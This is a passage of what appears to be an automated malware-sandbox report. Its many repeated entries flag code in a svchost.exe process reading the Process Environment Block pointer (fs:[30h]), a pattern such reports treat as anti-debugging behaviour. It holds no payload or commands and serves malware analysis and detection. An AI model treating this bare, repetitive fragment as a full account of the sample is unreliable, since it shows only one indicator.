Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]	3_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]	3_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]	3_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]	3_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A020 mov eax, dword ptr fs:[00000030h]	3_2_03C2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C020 mov eax, dword ptr fs:[00000030h]	3_2_03C2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6030 mov eax, dword ptr fs:[00000030h]	3_2_03CC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB07C3 mov eax, dword ptr fs:[00000030h]	3_2_03CB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]	3_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]	3_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]	3_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]	3_2_03CBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C347FB mov eax, dword ptr fs:[00000030h]	3_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C347FB mov eax, dword ptr fs:[00000030h]	3_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD678E mov eax, dword ptr fs:[00000030h]	3_2_03CD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C307AF mov eax, dword ptr fs:[00000030h]	3_2_03C307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE47A0 mov eax, dword ptr fs:[00000030h]	3_2_03CE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6674D mov esi, dword ptr fs:[00000030h]	3_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6674D mov eax, dword ptr fs:[00000030h]	3_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6674D mov eax, dword ptr fs:[00000030h]	3_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30750 mov eax, dword ptr fs:[00000030h]	3_2_03C30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBE75D mov eax, dword ptr fs:[00000030h]	3_2_03CBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72750 mov eax, dword ptr fs:[00000030h]	3_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72750 mov eax, dword ptr fs:[00000030h]	3_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB4755 mov eax, dword ptr fs:[00000030h]	3_2_03CB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38770 mov eax, dword ptr fs:[00000030h]	3_2_03C38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C700 mov eax, dword ptr fs:[00000030h]	3_2_03C6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30710 mov eax, dword ptr fs:[00000030h]	3_2_03C30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C60710 mov eax, dword ptr fs:[00000030h]	3_2_03C60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C720 mov eax, dword ptr fs:[00000030h]	3_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C720 mov eax, dword ptr fs:[00000030h]	3_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6273C mov eax, dword ptr fs:[00000030h]	3_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6273C mov ecx, dword ptr fs:[00000030h]	3_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6273C mov eax, dword ptr fs:[00000030h]	3_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAC730 mov eax, dword ptr fs:[00000030h]	3_2_03CAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]	3_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]	3_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	3_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	3_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	3_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	3_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	3_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	3_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34690 mov eax, dword ptr fs:[00000030h]	3_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34690 mov eax, dword ptr fs:[00000030h]	3_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]	3_2_03C6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C666B0 mov eax, dword ptr fs:[00000030h]	3_2_03C666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4C640 mov eax, dword ptr fs:[00000030h]	3_2_03C4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF866E mov eax, dword ptr fs:[00000030h]	3_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF866E mov eax, dword ptr fs:[00000030h]	3_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A660 mov eax, dword ptr fs:[00000030h]	3_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A660 mov eax, dword ptr fs:[00000030h]	3_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C62674 mov eax, dword ptr fs:[00000030h]	3_2_03C62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE609 mov eax, dword ptr fs:[00000030h]	3_2_03CAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72619 mov eax, dword ptr fs:[00000030h]	3_2_03C72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E627 mov eax, dword ptr fs:[00000030h]	3_2_03C4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C66620 mov eax, dword ptr fs:[00000030h]	3_2_03C66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68620 mov eax, dword ptr fs:[00000030h]	3_2_03C68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3262C mov eax, dword ptr fs:[00000030h]	3_2_03C3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	3_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	3_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C365D0 mov eax, dword ptr fs:[00000030h]	3_2_03C365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	3_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	3_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C325E0 mov eax, dword ptr fs:[00000030h]	3_2_03C325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	3_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	3_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C32582 mov eax, dword ptr fs:[00000030h]	3_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C32582 mov ecx, dword ptr fs:[00000030h]	3_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C64588 mov eax, dword ptr fs:[00000030h]	3_2_03C64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E59C mov eax, dword ptr fs:[00000030h]	3_2_03C6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	3_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	3_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	3_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C545B1 mov eax, dword ptr fs:[00000030h]	3_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C545B1 mov eax, dword ptr fs:[00000030h]	3_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38550 mov eax, dword ptr fs:[00000030h]	3_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38550 mov eax, dword ptr fs:[00000030h]	3_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]	3_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]	3_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]	3_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6500 mov eax, dword ptr fs:[00000030h]	3_2_03CC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C304E5 mov ecx, dword ptr fs:[00000030h]	3_2_03C304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEA49A mov eax, dword ptr fs:[00000030h]	3_2_03CEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C364AB mov eax, dword ptr fs:[00000030h]	3_2_03C364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C644B0 mov ecx, dword ptr fs:[00000030h]	3_2_03C644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]	3_2_03CBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEA456 mov eax, dword ptr fs:[00000030h]	3_2_03CEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2645D mov eax, dword ptr fs:[00000030h]	3_2_03C2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5245A mov eax, dword ptr fs:[00000030h]	3_2_03C5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBC460 mov ecx, dword ptr fs:[00000030h]	3_2_03CBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]	3_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]	3_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]	3_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]	3_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]	3_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]	3_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]	3_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]	3_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]	3_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C427 mov eax, dword ptr fs:[00000030h]	3_2_03C2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A430 mov eax, dword ptr fs:[00000030h]	3_2_03C6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]	3_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]	3_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]	3_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]	3_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]	3_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]	3_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]	3_2_03CDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	3_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	3_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	3_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5EBFC mov eax, dword ptr fs:[00000030h]	3_2_03C5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]	3_2_03CBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40BBE mov eax, dword ptr fs:[00000030h]	3_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40BBE mov eax, dword ptr fs:[00000030h]	3_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	3_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	3_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	3_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	3_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]	3_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]	3_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]	3_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]	3_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	3_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	3_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFAB40 mov eax, dword ptr fs:[00000030h]	3_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD8B42 mov eax, dword ptr fs:[00000030h]	3_2_03CD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28B50 mov eax, dword ptr fs:[00000030h]	3_2_03C28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDEB50 mov eax, dword ptr fs:[00000030h]	3_2_03CDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2CB7E mov eax, dword ptr fs:[00000030h]	3_2_03C2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04B00 mov eax, dword ptr fs:[00000030h]	3_2_03D04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	3_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	3_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	3_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	3_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]	3_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]	3_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]	3_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30AD0 mov eax, dword ptr fs:[00000030h]	3_2_03C30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	3_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	3_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	3_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	3_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
